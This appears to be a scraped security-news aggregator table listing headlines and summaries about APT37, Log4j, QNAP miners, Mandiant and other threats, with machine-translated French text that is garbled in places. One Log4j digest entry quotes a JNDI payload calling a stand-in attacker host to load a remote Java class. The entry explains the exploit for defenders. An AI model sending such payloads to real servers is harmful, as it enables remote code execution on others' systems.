What's new arround internet
| Src | Date (GMT) | Titre | Description | Tags | Stories | Notes |
 |
2022-04-28 17:15:39 | CVE-2022-29412 (lien direct) | Multiple Cross-Site Request Forgery (CSRF) vulnerabilities in Hermit ????? plugin | Cloud | APT 37 | |
|
2022-04-28 17:15:38 | CVE-2022-29410 (lien direct) | Authenticated SQL Injection (SQLi) vulnerability in Mufeng's Hermit ????? plugin | Vulnerability Cloud | APT 37 | |
 |
2022-04-26 11:38:17 | Nation-state Hackers Target Journalists with Goldbackdoor Malware (lien direct) | A campaign by APT37 used a sophisticated malware to steal information about sources , which appears to be a successor to Bluelight. | Malware Cloud | APT 37 | |
 |
2022-04-26 10:13:51 | North Korea targets journalists with novel malware (lien direct) | State sponsored hackers operating out of North Korea have been targeting journalists with a novel malware strain, it has been revealed. The group, known as APT37, distribute the malware through a phishing attack originally discovered by NK news, a US news site specialising in covering news and providing research and analysis about North Korea, using […] | Malware Cloud | APT 37 | |
 |
2022-04-26 08:25:03 | North Korea-linked APT37 targets journalists with GOLDBACKDOOR (lien direct) | North Korea-linked APT37 group is targeting journalists that focus on DPRK with a new piece of malware. North Korea-linked APT37 group (aka Ricochet Chollima) has been spotted targeting journalists focusing on DPRK with a new piece of malware. The campaign was discovered by journalists at NK News, an American news site that focuses on North […] | Cloud | APT 37 | |
 |
2022-04-26 02:53:07 | North Korean Hackers Target Journalists with GOLDBACKDOOR Malware (lien direct) | A state-backed threat actor with ties to the Democratic People's Republic of Korea (DRPK) has been attributed to a spear-phishing campaign targeting journalists covering the country with the ultimate goal of deploying a backdoor on infected Windows systems. The intrusions, said to be the work of Ricochet Chollima, resulted in the deployment of a novel malware strain called GOLDBACKDOOR, an | Malware Threat Cloud | APT 37 | |
 |
2022-03-22 16:12:11 | Storm Cloud à l'horizon: Gimmick malware frappe à MacOS Storm Cloud on the Horizon: GIMMICK Malware Strikes at macOS (lien direct) |
> Fin 2021, Volexity a découvert une intrusion dans un environnement surveillé dans le cadre de son service de surveillance de la sécurité du réseau.La volexité a détecté un système exécutant FRP, autrement connu sous le nom de proxy inverse rapide, et a ensuite détecté le balayage de port interne peu de temps après.Ce trafic a été déterminé comme non autorisé et le système, un MacBook Pro exécutant MacOS 11.6 (Big Sur), a été isolé pour une analyse médico-légale supplémentaire.Volexity a pu exécuter la surtension Collect pour acquérir la mémoire du système (RAM) et sélectionner les fichiers d'intérêt dans la machine pour l'analyse.Cela a conduit à la découverte d'une variante macOS d'un gadget d'appels de volexité d'implant de logiciels malveillants.La volexité a rencontré des versions Windows de la famille des logiciels malveillants à plusieurs reprises.Gimmick est utilisé dans les attaques ciblées de Storm Cloud, un acteur de menace d'espionnage chinois connue pour attaquer les organisations à travers l'Asie.Il s'agit d'une famille de logiciels malveillants multiplateforme riche en fonctionnalités qui utilise des services d'hébergement de cloud public (tels que Google [& # 8230;]
>In late 2021, Volexity discovered an intrusion in an environment monitored as part of its Network Security Monitoring service. Volexity detected a system running frp, otherwise known as fast reverse proxy, and subsequently detected internal port scanning shortly afterward. This traffic was determined to be unauthorized and the system, a MacBook Pro running macOS 11.6 (Big Sur), was isolated for further forensic analysis. Volexity was able to run Surge Collect to acquire system memory (RAM) and select files of interest from the machine for analysis. This led to the discovery of a macOS variant of a malware implant Volexity calls GIMMICK. Volexity has encountered Windows versions of the malware family on several previous occasions. GIMMICK is used in targeted attacks by Storm Cloud, a Chinese espionage threat actor known to attack organizations across Asia. It is a feature-rich, multi-platform malware family that uses public cloud hosting services (such as Google […] |
Malware Threat Cloud | ★★★ | |
 |
2022-03-09 18:00:00 | FedRamp Ready: La dernière désignation de Mandiant \\ prend en charge les clients du secteur public FedRAMP Ready: Mandiant\\'s Latest Designation Supports Public Sector Customers (lien direct) |
Dans une autre étape importante dans sa mission pour que chaque organisation soit sécurisée des cyber-menaces, Mandiant a récemment annoncé qu'il avait obtenu la désignation FedRamp Ready pour sa première solution évaluée, Mandiant Advantage Défense automatisée .Atteignant la préparation à Le niveau d'impact élevé, la défense automatisée est désormais disponible dans le FedRamp Marketplace En tant qu'offre de services cloud (CSO), permettant aux agences fédérales de profiter de ses capacités de détection, de priorisation et de réponse accélérées.
Qu'est-ce que FedRamp?
Fedramp est un Programme du gouvernement qui favorise l'adoption de
In yet another major milestone in its mission to make every organization secure from cyber threats, Mandiant recently announced that it achieved FedRAMP Ready designation for its first evaluated solution, Mandiant Advantage Automated Defense. Achieving readiness at the High impact level, Automated Defense is now available in the FedRAMP Marketplace as a Cloud Service Offering (CSO), allowing federal agencies to take advantage of its accelerated threat detection, prioritization and response capabilities. What is FedRAMP? FedRAMP is a government-wide program that promotes the adoption of |
Threat Cloud | ★★★ | |
|
2022-02-02 13:00:00 | Annonçant la gestion de la surface d'attaque mandiante avantage Announcing Mandiant Advantage Attack Surface Management (lien direct) |
Vous voulez sauter maintenant?Commencez avec Mandiant Advantage Attack Surface Management En créant votre Free Account aujourd'hui!
Alors que les organisations continuent de numériser leur entreprise et que les employés sont autorisés à tirer parti de ces capacités, il n'est pas étonnant que les équipes de sécurité aient du mal à garder une trace des infrastructures, des applications, des services cloud et du saasSeul s'assurer que les politiques de sécurité sont respectées dans ces environnements.La surface d'attaque est considérablement et largement en expansion, et sans l'automatisation appropriée, il est peu probable que les équipes de sécurité aient la visibilité, le contrôle et
Want to jump in now? Get started with Mandiant Advantage Attack Surface Management by creating your free account today! As organizations continue to digitize their business and employees are empowered to leverage these capabilities, it\'s no wonder security teams struggle to keep track of infrastructure, applications, cloud services and SaaS usage-let alone ensure security policies are adhered to across these environments. The attack surface is dramatically and vastly expanding, and without the proper automation, it is unlikely that security teams will have the visibility, control, and |
Cloud | ★★ | |
 |
2022-01-19 00:00:00 | Quelles tendances émergentes de cybersécurité devraient-elles être conscientes? Alors que le monde devient plus connecté numériquement, les entreprises doivent être conscientes des risques croissants de cybersécurité. What Emerging Cybersecurity Trends Should Enterprises Be Aware Of?As the world becomes more digitally connected, enterprises need to be aware of the growing cybersecurity risks.Read More (lien direct) |
As the world becomes more digitally connected every year â and with the pandemic further accelerating digital transformation â all types of enterprises need to be aware of the growing cybersecurity risks that come with this shift. In Europe, for example, significant attacks on critical sectors more than doubled in 2020 compared to 2019, according to data from the European Union Agency for Cybersecurity, as reported by CNN. In 2021, the picture arguably became even bleaker around the world, with major ransomware attacks causing disruption to companies in industries ranging from energy to meat processing.In the first six months of 2021 alone, ransomware-related reported activity in the U.S. had a higher total value ($590 million) than all ransomware-related reported suspicious activity in the U.S. in 2020, according to the U.S. Department of Treasury\'s Financial Crimes Enforcement Network (FinCEN). The total number of suspicious events filed in the first six months of 2021 in the U.S. also exceeded all of what occurred in the country in 2020 by 30%, the agency reports. Yet itâs not just ransomware thatâs wreaking havoc. Enterprises also need to be prepared for cyber threats like denial of service (DoS) attacks, where a flood of network activity can interrupt servers, thereby causing business interruption. Cisco predicts that distributed denial of service (DDoS) attacks (a subset of DoS, which involves using multiple devices to send a flood of traffic, as opposed to just using one device with a DoS attack) globally will roughly âdouble from 7.9 million in 2018 to 15.4 million by 2023.âIn addition to preparing for these types of cyberattacks, enterprises will also increasingly need to be aware of and comply with privacy-related regulations. As governments around the world try to bolster their cybersecurity responses, they are passing or at least considering new rules and guidance around how companies need to handle sensitive data and privacy issues. Amidst this preparation, enterprises also need to recognize that cybersecurity plans arenât foolproof, especially as attacks evolve. That means assets could be at risk even with solid defenses in place. So, enterprises increasingly need to think about not just how to prevent cyber attacks but also consider the dollar-value cost of risk, given that events will inevitably occur. This process, known as cyber risk quantification â a form of financial quantification â helps enterprises think about and discuss cyber risk in definitive business terms. Knowing how much money is at stake and how different cyber events could affect revenue and profit can help businesses prioritize defenses and take mitigating action like securing cyber insurance. In this report, weâll take a closer look at these emerging cybersecurity trends that enterprises should be aware of. Understanding these areas can help organizations potentially improve their risk management, both from a cybersecurity and overall governance standpoint. ââEvolving Ransomware RisksWhile ransomware is not a new type of threat, the scale and intensity of ransomware continue to broaden. Enterprises large and small, across all types of industries, need to be prepared for these cyber attacks.For one, ransomware-as-a-service, âwhere ransomware variants are licensed to individuals and accomplices to execute attacks,â as Reuters explains, has been on the rise. Based on suspicious activity reports, FinCEN identified 68 ransomware variants in the first half of 2021.âThe resulting emergence of new attackers has led to increased uncertainty and volatility for companies in responding to attacks due to the lack of information on the growing number of ransomware threat actors,â adds Reuters.Part of the problem is also that ransomware attacks arenât just being launched on an ad-hoc basis by individuals. Instead, thereâs in | Ransomware Tool Threat Prediction Cloud | ★★★ | |
 |
2022-01-14 13:36:57 | Campagne malware en cours exploitant des infrastructures de cloud public (lien direct) | Une campagne de malwares en cours a récemment été documentée par le groupe Talos de Cisco. Selon ses experts, elle exploite des infrastructures de cloud public, comme les services cloud AWS d'Amazon et Azure de Microsoft. À la vue de cette attaque, les cybercriminels optent désormais pour une infrastructure d'attaque entièrement dynamique, afin de contourner la distribution initiale et la détection d'accès. The post Campagne malware en cours exploitant des infrastructures de cloud public first appeared on UnderNews. | Malware Cloud | ||
 |
2021-12-15 16:00:00 | Anomali Cyber Watch: Apache Log4j Zero-Day Exploit, Google Fighting Glupteba Botnet, Vixen Panda Targets Latin America and Europe, and More (lien direct) | The various threat intelligence stories in this iteration of the Anomali Cyber Watch discuss the following topics: Apache, Botnets, China, Espionage, Java, Russia, USB, and Vulnerabilities. The IOCs related to these stories are attached to Anomali Cyber Watch and can be used to check your logs for potential malicious activity.
Figure 1 - IOC Summary Charts. These charts summarize the IOCs attached to this magazine and provide a glimpse of the threats discussed.
Trending Cyber News and Threat Intelligence
Countless Servers Are Vulnerable to Apache Log4j Zero-Day Exploit
(published: December 10, 2021)
A critical vulnerability, registered as CVE-2021-44228, has been identified in Apache Log4j 2, which is an open source Java package used to enable logging in. The Apache Software Foundation (ASF) rates the vulnerability as a 10 on the common vulnerability scoring system (CVSS) scale. Cisco Talos has observed malicious activity related to CVE-2021-44228 beginning on December 2, 2021. This vulnerability affects millions of users and exploitation proof-of-concept code exists via LunaSec explains how to exploit it in five simple steps. These include: 1: Data from the User gets sent to the server (via any protocol). 2: The server logs the data in the request, containing the malicious payload: ${jndi:ldap://attacker.com/a} (where attacker.com is an attacker controlled server). 3: The Log4j vulnerability is triggered by this payload and the server makes a request to attacker.com via "Java Naming and Directory Interface" (JNDI). 4: This response contains a path to a remote Java class file (ex. http://second-stage.attacker.com/Exploit.class) which is injected into the server process. 5: This injected payload triggers a second stage, and allows an attacker to execute arbitrary code.
Analyst Comment: Log4j version 2.15.0 has been released to address this vulnerability, however, it only changes a default setting (log4j2.formatMsgNoLookups) from false to true. This means that if the setting is set back to false, Log4j will again be vulnerable to exploitation. The initial campaigns could have been detected by filtering on certain keywords such as "ldap", "jndi", but this detection method is easily bypassable.
MITRE ATT&CK: [MITRE ATT&CK] Exploit Public-Facing Application - T1190 | [MITRE ATT&CK] Exploitation for Client Execution - T1203 | [MITRE ATT&CK] Command and Scripting Interpreter - T1059 | [MITRE ATT&CK] Remote Services - T1021 | [MITRE ATT&CK] OS Credential Dumping - T1003 | [MITRE ATT&CK] Resource Hijacking - T1496 | [MITRE ATT&CK] Network Denial of Service - T1498
Tags: Log4j, CVE-2021-44228, Log4j2, Log4Shell, Apache, Zero-day, Java, Jndi, Class file
Over a Dozen Malicious NPM Packages Caught Hijacking Discord Servers
(published: December 8, 2021)
Researchers from the DevOps firm JFrog has found at least 17 malicious packages on the open source npm Registry for JavaScript. The names of the packages are: prerequests-xcode (version 1.0.4), discord-selfbot-v14 (version 12.0.3), discord-lofy (version 11.5.1), discordsystem (version 11.5.1), discord-vilao (version 1.0.0), fix-error (version 1 |
Malware Tool Vulnerability Threat Cloud | APT 37 APT 29 APT 15 APT 15 APT 25 | |
|
2021-12-14 16:00:00 | Azure Run Command pour les nuls Azure Run Command for Dummies (lien direct) |
Dans le récent article de blog de Mandiant \\, nous avons détaillé Activité d'intrusion russe présumée qui cible les fournisseurs de services gérés (MSP) pour accéder à leurs clients CLUSIDE \\ '.D'autres sociétés, comme Microsoft, ont observé Activité ciblée de manière similaire contre les clients de plusieurs Cloud et fournisseurs de services gérés . Une technique notable de ces intrusions est l'utilisation de commandes Azure Run pour passer latéralement des hyperviseurs gérés aux clients MSP \\ 'sous-jacent sous-jacentmachines virtuelles.
Ce dernier article de blog est une annexe supplémentaire pour mettre en surbrillance les commandes Azure Run et fournir
In Mandiant\'s recent blog post, we detailed suspected Russian intrusion activity that targeted managed services providers (MSP) to gain access to their customers\' cloud environments. Other companies, such as Microsoft, have observed similarly targeted activity against customers of several cloud and managed service providers. One notable technique from these intrusions is the use of Azure Run Commands to move laterally from managed hypervisors to the MSP customers\' underlying virtual machines. This latest blog post comes as a supplementary annex to highlight Azure Run Commands and provide |
Cloud | ★★ | |
|
2021-12-07 22:33:02 | Warning: Yet Another Bitcoin Mining Malware Targeting QNAP NAS Devices (lien direct) | Network-attached storage (NAS) appliance maker QNAP on Tuesday released a new advisory warning of a cryptocurrency mining malware targeting its devices, urging customers to take preventive steps with immediate effect. "A bitcoin miner has been reported to target QNAP NAS. Once a NAS is infected, CPU usage becomes unusually high where a process named '[oom_reaper]' could occupy around 50% of the | Malware Cloud | APT 37 | |
|
2021-12-07 16:04:00 | Anomali Cyber Watch: Nginx Trojans, BlackByte Ransomware, Android Malware Campaigns, and More (lien direct) | The various threat intelligence stories in this iteration of the Anomali Cyber Watch discuss the following topics: APT, Ransomware, Maldocs, E-Commerce, Phishing, and Vulnerabilities. The IOCs related to these stories are attached to Anomali Cyber Watch and can be used to check your logs for potential malicious activity.
Figure 1 - IOC Summary Charts. These charts summarize the IOCs attached to this magazine and provide a glimpse of the threats discussed.
Trending Cyber News and Threat Intelligence
New Malware Hides as Legit Nginx Process on E-Commerce Servers
(published: December 2, 2021)
Researchers at Sansec discovered NginRAT, a new malware variant that has been found on servers in the US, Germany, and France. Put in place to intercept credit card payments, this malware impersonates legitimate nginx processes which makes it very difficult to detect. NginRAT has shown up on systems that were previously infected with CronRAT, a trojan that schedules processes to run on invalid calendar days. This is used as a persistence technique to ensure that even if a malicious process is killed, the malware has a way to re-infect the system.
Analyst Comment: Threat actors are always adapting to the security environment to remain effective. New techniques can still be spotted with behavioural analysis defenses and social engineering training. Ensure that your company's firewall blocks all entry points for unauthorized users, and maintain records of how normal traffic appears on your network. Therefore, it will be easier to spot unusual traffic and connections to and from your network to potentially identify malicious activity.
MITRE ATT&CK: [MITRE ATT&CK] Obfuscated Files or Information - T1027 | [MITRE ATT&CK] Shared Modules - T1129
Tags: NginRAT, CronRAT, Nginx, North America, EU
How Phishing Kits Are Enabling A New Legion Of Pro Phishers
(published: December 2, 2021)
Phishing kits, such as XBALTI are seeing increased use against financial institutions. Mixing email with SMS messages, attackers are targeting companies such as Charles Schwab, J.P. Morgan Chase, RBC Royal Bank and Wells Fargo. Victims are targeted and asked to verify account details. The attack is made to appear legitimate by redirecting to the real sites after information has been harvested.
Analyst Comment: With financial transactions increasing around this time of year, it is likely financially themed malspam and phishing emails will be a commonly used tactic. Therefore, it is crucial that your employees are aware of their financial institution's policies regarding electronic communication. If a user is concerned due to the scare tactics often used in such emails, they should contact their financial institution via legitimate email or another form of communication. Requests to open a document in a sense of urgency and poor grammar are often indicative of malspam or phishing attacks. Said emails should be properly avoided and reported to the appropriate personnel.
Tags: Phishing, XBATLI
Injection is the New Black: Novel RTF Template Inject Technique Poised for Widespread Adoption Beyond APT Actors
(pub |
Ransomware Malware Tool Vulnerability Threat Cloud | APT 37 | ★★★★ |
|
2021-12-07 15:28:27 | Bitcoin Miner [oom_reaper] targets QNAP NAS devices (lien direct) | Taiwanese vendor QNAP warns customers of ongoing attacks targeting their NAS devices with cryptocurrency miners. Taiwanese vendor QNAP warns customers of threat actors targeting their NAS devices with cryptocurrency miners. Upon compromising the devices, the miner will create a new process named [oom_reaper] that allows threat actors to mine Bitcoin The above process could occupy […] | Threat Cloud | APT 37 | |
 |
2021-11-30 12:24:19 | North Korean Hackers Use New \'Chinotto\' Malware to Target Windows, Android Devices (lien direct) | Kaspersky has analyzed a new espionage campaign conducted by the threat actor named ScarCruft, and the security firm's researchers have uncovered a previously unknown malware that has been used to target Windows and Android devices. | Malware Threat Cloud | APT 37 | |
 |
2021-11-30 11:24:48 | Recent APT37 Activity and Chinotto, a Multi Platform Infostealer (lien direct) | FortiGuard Labs is aware of reports of recent activity from APT37. APT37 is a nation-state threat actor attributed to North Korea. The latest discovery by researchers at Kaspersky Labs has revealed a sophisticated, targeted attack that utilizes the stolen credentials from Facebook and email accounts belonging to an associate of the targeted victim.The victim was socially engineered and compelled into opening rar zipped attachments purporting to be from the trusted sender that contained a malicious Word document. The Word document is multi stage in design, and uses a malicious macro to initiate the first stage. The first stage detects the presence of AV software, and if AV is not present will initiate the second stage which is a shellcode that will download the final third stage payload.Ultimately, after several months of dwelling undetected on the infected system, the backdoor will then download the multiplatform infostealer, "Chinotto." Windows variants were sent via spearphishing emails and Android variants were sent via SMShing texts.What Operating Systems are Affected?Chinoto targets Windows and Android based operating systems.Is This Limited to Targeted Attacks?Yes.How Serious of an Issue is This?Medium.What is APT37?APT37 (also known as GROUP123 and Scarcruft), attributed to North Korean threat actors, has been in operation for several years. During that time, APT37 has been attributed to the Adobe Flash zero-day attack (CVE-2018-4878) that targeted researchers based in South Korea who were performing research on North Korea. APT37 focuses on various organizations with an interest in North Korea.APT37 is famous for exploiting vulnerabilities in the Hangul Word Processor (HWP) which is commonly used in South Korea, especially by those in the government sector. Analysis suggests that this is a very detailed and sophisticated threat actor with an arsenal of malware and exploits at their disposal that targets various verticals and organizations with specially crafted campaigns. Other vectors besides the Adobe and Hangul vulnerabilities observed were the usage of Microsoft vulnerabilities as well, specifically CVE-2017-0199 (Microsoft Office UAC bypass) and CVE-2015-2545 (Microsoft Office Encapsulated PostScript (EPS). For further details on the exploitation of HWP documents and campaigns previously analyzed, please refer to our blog here.What is the Status of Coverage?FortiGuard Labs has AV coverage in place for publicly available samples as:VBA/Agent.AAK!trW32/PossibleThreatVBA/Agent.AF3C!trW32/Agent.ACDD!trPossibleThreat.MUPossibleThreat.PALLAS.HW32/FRS.VSNTGF20!trW32/Bsymem.MSJ!trAll network IOCs are blocked by the WebFiltering client.Any Other Suggested Mitigation?Due to the ease of disruption and the potential for damage to daily operations, reputation, and unwanted release of personally identifiable information (PII), etc. it is important to keep all AV and IPS signatures up to date.It is also important to ensure that all known vendor vulnerabilities are addressed and updated to protect from attackers having a foothold within a network. Attackers are well aware of the difficulty of patching and if it is determined that patching is not feasible at this time, an assessment should be conducted to determine risk.Also, as this campaign was sent via spearphishing and smsshing - organizations are encouraged to conduct ongoing training sessions to educate and inform personnel about the latest phishing/spearphishing/smishing attacks. They also need to encourage employees to never open attachments from someone they don't know, and to always treat emails from unrecognized/untrusted senders with caution. Since it has been reported that various phishing/spearphishing/smishing attacks have been delivered via social engineering distribution mechanisms, it is crucial that end users within an organization be made aware of the various types of attacks being delivered. This can be accomplished through regular training sessions and impromptu tests using predetermined templates by an organizations' internal security department. Si | Malware Threat Patching Cloud | APT 37 | |
 |
2021-11-29 10:00:31 | ScarCruft surveilling North Korean defectors and human rights activists (lien direct) | The ScarCruft group (also known as APT37 or Temp.Reaper) is a nation-state sponsored APT actor. Recently, we had an opportunity to perform a deeper investigation on a host compromised by this group. | Cloud | APT 37 | |
 |
2021-11-29 08:43:29 | APT37 targets journalists with Chinotto multi-platform malware (lien direct) | North Korean state hacking group APT37 targets South Korean journalists, defectors, and human rights activists in watering hole, spear-phishing emails, and smishing attacks delivering malware dubbed Chinotto capable of infecting Windows and Android devices. [...] | Malware Cloud | APT 37 | |
|
2021-11-29 05:14:10 | New Chinotto Spyware Targets North Korean Defectors, Human Rights Activists (lien direct) | North Korean defectors, journalists who cover North Korea-related news, and entities in South Korea are being zeroed in on by a nation-state-sponsored advanced persistent threat (APT) as part of a new wave of highly-targeted surveillance attacks. Russian cybersecurity firm Kaspersky attributed the infiltrations to a North Korean hacker group tracked as ScarCruft, also known as APT37, Reaper | Threat Cloud | APT 37 APT 37 | |
|
2021-11-19 15:14:40 | North Korea-linked TA406 cyberespionage group activity in 2021 (lien direct) | North Korea-linked TA406 APT group has intensified its attacks in 2021, particularly credential harvesting campaigns. A report published by Proofpoint revealed that the North Korea-linked TA406 APT group (Kimsuky, Thallium, and Konni, Black Banshee, Velvet Chollima) has intensified its operations in 2021. The TA406 cyber espionage group was first spotted by Kaspersky researchers in 2013. At the end of October […] | Cloud | APT 37 | |
 |
2021-11-10 14:11:03 | North Korean attackers use malicious blogs to deliver malware to high-profile South Korean targets (lien direct) |
By Jung soo An and Asheer Malhotra, with contributions from Kendall McKay.
Cisco Talos has observed a new malware campaign operated by the Kimsuky APT group since June 2021.Kimsuky, also known as Thallium and Black Banshee, is a North Korean state-sponsored advanced...
[[ This is only the beginning! Please visit the blog for the complete entry ]] |
Malware Cloud | APT 37 | |
|
2021-11-02 08:01:01 | Mandiant Data Science présente la dernière recherche sur l'apprentissage de la machine de sécurité à Camlis \\ '21 Mandiant Data Science Showcases Latest Security Machine Learning Research at CAMLIS \\'21 (lien direct) |
La mission de l'équipe de science des données mandialiants (MDS) est de développer des solutions d'apprentissage automatique innovantes qui appliquent l'expertise unique et l'intelligence des menaces de Maniant \\ à l'échelle pour nos clients.MDS est impliqué dans de nombreux projets divers dispensés dans le cadre de la Mandiant Advantage SaaS Platform, mais nous présentons égalementet publier des recherches de pointe à l'intersection de la sécurité et de l'apprentissage automatique lors des principales conférences de l'industrie et des universitaires.Nous sommes fiers d'annoncer que notre équipe a récemment eu quatre conférences acceptées au Conférence sur l'apprentissage appliqué en matière de sécurité de l'information (CAMLIS)
The Mandiant Data Science (MDS) team\'s mission is to develop innovative machine learning solutions that apply Mandiant\'s unique expertise and threat intelligence at scale for our customers. MDS is involved in many diverse projects delivered as part of the Mandiant Advantage SaaS platform, but we also present and publish cutting-edge research at the intersection of security and machine learning at leading industry and academic conferences. We are proud to announce that our team recently had four talks accepted at the Conference on Applied Machine Learning in Information Security (CAMLIS) |
Threat Cloud | ★★★ | |
|
2021-08-24 17:11:00 | Anomali Cyber Watch: ProxyShell Being Exploited to Install Webshells and Ransomware, Neurevt Trojan Targeting Mexican Users, Secret Terrorist Watchlist Exposed, and More (lien direct) | The various threat intelligence stories in this iteration of the Anomali Cyber Watch discuss the following topics: APT37 (InkySquid), BlueLight, Ransomware, T-Mobile Data Breach, Critical Vulnerabilities, IoT, Kalay, Neurevt, and ProxyShell. The IOCs related to these stories are attached to Anomali Cyber Watch and can be used to check your logs for potential malicious activity.
Figure 1 - IOC Summary Charts. These charts summarize the IOCs attached to this magazine and provide a glimpse of the threats discussed. Current Anomali ThreatStream users can query these indicators under the “anomali cyber watch” tag.
Trending Cyber News and Threat Intelligence
Microsoft Exchange Servers Still Vulnerable to ProxyShell Exploit
(published: August 23, 2021)
Despite patches a collection of vulnerabilities (ProxyShell) discovered in Microsoft Exchange being available in the July 2021 update, researchers discovered nearly 2,000 of these vulnerabilities have recently been compromised to host webshells. These webshells allow for attackers to retain backdoor access to compromised servers for further exploitation and lateral movement into the affected organizations. Researchers believe that these attacks may be related to the recent LockFile ransomware attacks.
Analyst Comment: Organizations running Microsoft Exchange are strongly encouraged to prioritize updates to prevent ongoing exploitation of these vulnerabilities. In addition, a thorough investigation to discover and remove planted webshells should be undertaken as the patches will not remove planted webshells in their environments. A threat intelligence platform (TIP) such as Anomali Threatstream can be a valuable tool to assist organizations ingesting current indicators of compromise (IOCs) and determine whether their Exchange instances have been compromised.
MITRE ATT&CK: [MITRE ATT&CK] Exploitation for Client Execution - T1203 | [MITRE ATT&CK] Web Shell - T1100 | [MITRE ATT&CK] Hidden Files and Directories - T1158 | [MITRE ATT&CK] Source - T1153
Tags: CVE-2021-34473, CVE-2021-34523, CVE-2021-31207, Exchange, ProxyShell, backdoor
LockFile: Ransomware Uses PetitPotam Exploit to Compromise Windows Domain Controllers
(published: August 20, 2021)
A new ransomware family, named Lockfile by Symantec researchers, has been observed on the network of a US financial organization. The first known instance of this ransomware was July 20, 2021, and activity is ongoing. This ransomware has been seen largely targeting organizations in a wide range of industries across the US and Asia. The initial access vector remains unknown at this time, but the ransomware leverages the incompletely patched PetitPotam vulnerability (CVE-2021-36942) in Microsoft's Exchange Server to pivot to Domain Controllers (DCs) which are then leveraged to deploy ransomware tools to devices that connect to the DC. The attackers appear to remain resident on the network for several |
Ransomware Malware Tool Vulnerability Threat Patching Cloud | APT 37 | |
|
2021-08-19 06:47:34 | NK-linked InkySquid APT leverages IE exploits in recent attacks (lien direct) | North Korea-linked InkySquid group leverages two Internet Explorer exploits to deliver a custom implant in attacks aimed at a South Korean online newspaper. Experts from cybersecurity firm Volexity reported that North Korea-linked InkySquid group (aka ScarCruft, APT37, Group123, and Reaper) leverages two Internet Explorer exploits to deliver a custom backdoor in watering hole attacks aimed at the […] | Cloud | APT 37 | |
|
2021-08-18 01:33:33 | NK Hackers Deploy Browser Exploits on South Korean Sites to Spread Malware (lien direct) | A North Korean threat actor has been discovered taking advantage of two exploits in Internet Explorer to infect victims with a custom implant as part of a strategic web compromise (SWC) targeting a South Korean online newspaper.
Cybersecurity firm Volexity attributed the attacks to a threat actor it tracks as InkySquid, and more widely known by the monikers ScarCruft and APT37. Daily NK, the |
Malware Threat Cloud | APT 37 | |
|
2021-08-10 03:38:14 | Une mise à jour intrigante de l'avantage mandiant An Intriguing Update to Mandiant Advantage (lien direct) |
Aujourd'hui, Mandiant a fait une annonce significative dans la promotion des capacités de la plate-forme SaaS de mandiant avantage avec l'acquisition d'unEmerging Attack Surface Management (ASM) Leader, intrigue.Avec cette acquisition, nous nous réjouissons également de Jonathan Cran et de l'équipe d'intrigue auprès de la famille Mandiant.Nous sommes très heureux que Jonathan, un visionnaire et entrepreneur connu de l'industrie, se joigne à Maniant alors que nous continuons à développer nos capacités d'avantage.
ASM émerge rapidement, conduisant la valeur grâce à la visibilité des actifs et de l'exposition dans la surface d'attaque destinée à Internet.Il comble une lacune entre l'actif
Today Mandiant made a significant announcement in furthering the capabilities of the Mandiant Advantage SaaS platform with the acquisition of an emerging Attack Surface Management (ASM) leader, Intrigue. With this acquisition we also welcome Jonathan Cran and the Intrigue team to the Mandiant family. We are very excited to have Jonathan, a known industry visionary and entrepreneur, join Mandiant as we continue to build out our Advantage capabilities. ASM is quickly emerging, driving value through asset and exposure visibility in internet-facing attack surface. It fills a gap between asset |
Cloud | ★★★★ | |
|
2021-06-02 10:00:00 | Un nouvel avenir pour Fireeye et Mandiant: Accélération des opportunités A New Future for FireEye and Mandiant: Accelerating Opportunities (lien direct) |
avec ANNONCE D'AUJOURD'HUI De la vente de l'entreprise FireEye Products To Symphony Technology Group (STG), nous avons fait un pas en avant important pour nous aider à mieux servir nos clients et accélérer les stratégies qui sontDéfinir l'avenir de la cybersécurité.
La transaction séparera les produits de sécurité de Fireeye \\, des e-mails, des points de terminaison et des produits de sécurité cloud, ainsi que la plate-forme de gestion et d'orchestration de la sécurité connexe à partir de logiciels et services d'agnostiques mandiant solutions \\ '.Le résultat: les deux organisations seront en mesure d'accélérer les investissements en croissance, de poursuivre de nouvelles voies de mise sur le marché et
With today\'s announcement of the sale of the FireEye Products business to Symphony Technology Group (STG), we have taken an important step forward to help us better serve our customers and accelerate strategies that are defining the future of cyber security. The transaction will separate FireEye\'s network, email, endpoint, and cloud security products, and related security management and orchestration platform from Mandiant Solutions\' controls-agnostic software and services. The result: both organizations will be able to accelerate growth investments, pursue new go-to-market pathways, and |
Cloud | ★★★ | |
 |
2021-02-11 11:00:00 | UN Links North Korea to $281m Crypto Exchange Heist (lien direct) | Most funds recovered but attack bears hallmarks of hermit kingdom | Cloud | APT 37 | |
|
2021-01-08 01:54:44 | ALERT: North Korean hackers targeting South Korea with RokRat Trojan (lien direct) | A North Korean hacking group has been found deploying the RokRat Trojan in a new spear-phishing campaign targeting the South Korean government.
Attributing the attack to APT37 (aka Starcruft, Ricochet Chollima, or Reaper), Malwarebytes said it identified a malicious document last December that, when opened, executes a macro in memory to install the aforementioned remote access tool (RAT).
"The |
Tool Cloud | APT 37 | |
 |
2021-01-06 15:14:45 | Retrohunting APT37: North Korean APT used VBA self decode technique to inject RokRat (lien direct) |
A North Korean threat group has swapped the usual Hangul Office lures for a cleverly packed Office macro.
Categories: Social engineeringThreat analysis
Tags: APT37HangulkoreaOfficerokratVBA
(Read more...)
|
Threat Cloud | APT 37 | |
|
2021-01-05 11:55:57 | North Korean software supply chain attack targets stock investors (lien direct) | North Korean hacking group Thallium aka APT37 has been targeting a private stock investment messenger service in a supply chain attack, as reported this week. [...] | Cloud | APT 37 | |
|
2020-11-17 00:00:00 | CRIMZONâ¢: The Data Behind the FrameworkA report that highlights a subset of the empirical validation for the CRIMZON⢠framework.Read More (lien direct) | âAbstract The CRIMZON⢠framework defines the minimal elements needed to provide a view of accumulated cyber risk. For natural catastrophe risk, individual policy exposures can be aggregated within geographic zones.Similarly, cyber exposures can be aggregated using CRIMZONâ¢. Location also holds importance when assessing cyber catastrophe risk, however, two additional elements must be taken into account to properly assess cyber risk accumulation: industry and company size. Insured companies with common characteristics related to location, industry, and entity size tend to be exposed to similar types of cyber events because these elements also correspond to technologies or service providers used. Based on an analysis of millions of cyber events in the last 20 years, Kovrr conducted extensive research, to serve as the core empirical validation for the CRIMZON framework. Below is a subset of the research, in which a study group of 120 CRIMZON was determined by selecting CRIMZON with the highest relevance to the cyber insurance market(he research group was compiled according to criteria detailed in (Appendix A) The total number of unique companies in the study group is 20,000, with an average number of 152 companies within a CRIMZON, and a median of 86 companies. The research criteria focused on companiesâ location industry, entity size, and the hosting and mail technology and service providers used by companies. The results showed a concentration of technologies and services when grouping by location, and further 